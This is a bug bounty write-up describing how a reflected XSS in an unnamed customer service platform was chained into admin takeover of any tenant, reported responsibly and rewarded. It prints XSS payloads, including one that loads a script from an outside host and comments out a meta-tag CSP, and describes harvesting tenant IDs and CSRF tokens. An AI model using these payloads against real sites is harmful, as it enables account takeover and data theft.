The one where I owned a customer service platform

Let’s refer to this platform as ABC Communications since they don’t allow disclosure. Let’s dive into this awesome bug I found where I turned a simple XSS into a cool but simple bug chain that allowed myself to add myself as an admin of any tenant of this particular customer service platform.

I spent about 40 hours on this application. I dove deep. I was on vacation with my family when this all started and I spent an unhealthy amount of time just walking through the application. Understanding the logic. The protection mechanisms. At 40 hours, I was kind of over it, but…there was some functionality that I hadn’t looked at. There was a knowledge-base feature of the app that looked a little different from everything else, which always piques my interest. When things look different, they probably were handled differently in development, and when devs deviate from how they did things with the rest of the application, this typically breeds bugs.

I opened caido and just started stepping through everything. At first, nothing really interesting caught my eye and for the most part, the data flowed the same as the rest of the app and after a few hours, I decided to take a break to grab an energy drink and let my mind rest before getting back to it. I came back to my laptop and I noticed a singular issue in my caido proxy findings tab. I use this cool workflow by bebiksior called ‘Caido Reflector.’ It creates a finding if it detects a query value reflected in the response and it detected that the locale parameter on this one page was getting reflected. I threw in a simple payload to verify I could break out of the context, and sure enough I could break out and reflect directly to the page. The typical ```“><script>alert()</script>``` payload popped CSP errors, but ```"><svg onload=alert()>``` gave me the coveted alert box and I breathed a sigh of relief.

So this XSS was already impactful to the point that I could grab the x-csrf-token header value from the cookies which allowed me to bypass protections, but putting all of that code in the url was a hassle and I wanted the ability to do more with my XSS. I started looking at this CSP that was restricting me, and I noticed yet another difference in how this part of the application worked. Instead of a server-side CSP that came back in the response headers, they loaded it via a <meta> tag that followed my injection point. This meant that by appending <!--- to my payload, it would comment out the CSP. I laughed when it worked. So, now I can work with the following payload: “><script src=’https://poc.un1tycyb3r.com/poc.js’></script><!---.

I could load my own scripts which gave me a lot of freedom in building my payload. And with knowledge of all the different requests, I chose to make my PoC on that adds my attacker account as an admin of the victim tenant. I probably tested and retested the PoC 15 times, and to my joy it worked every time. My exploit could effectively give me control over any tenant using the platform that I wanted to target.

After submitting to the program, I was feeling pretty good: until they downgraded it to a medium. They insisted that it was only exploitable by members of the same organization. The structure of the endpoint was like so: /blah/company-id/blah/unique-id/blah/unique-id. I knew it was externally exploitable, but I needed to show irrefutable proof that I could craft the exploit for any company. It was at this point that I remembered where I could get it. The knowledge-bases had a front facing endpoint that is publicly accessible and in a script tag towards the bottom of the page, it leaked the company id, and the two unique id’s that I needed to build the exploit for any company that I wanted to target. All I would have to do is go to their front-facing knowledge base and grab those values. I did a PoC for the programs test account and it was a great feeling when I got the following reply when it worked: “Noted. Adjusting back to high.”

Not only did they adjust the severity to high, but because of the work I put in to show max impact, I was awarded the maximum bounty for a high severity bug.

Some takeaways I think you should walk away with:

Get intimate with the application you are assessing. Those quirky or specific details could be the difference between a medium and a high or even a high and a crit.Show max impact. Don’t just submit a bug. Demonstrate the maximum amount of impact and be detailed in your attack scenario. Programs appreciate the extra work you put in and the good ones will award you accordingly.Always be aware of parts of the app that look and behave differently from the rest. Bugs galore exist in the deviations from the norm.

Hope you enjoyed the writeup!

Till next time,

un1tycyb3r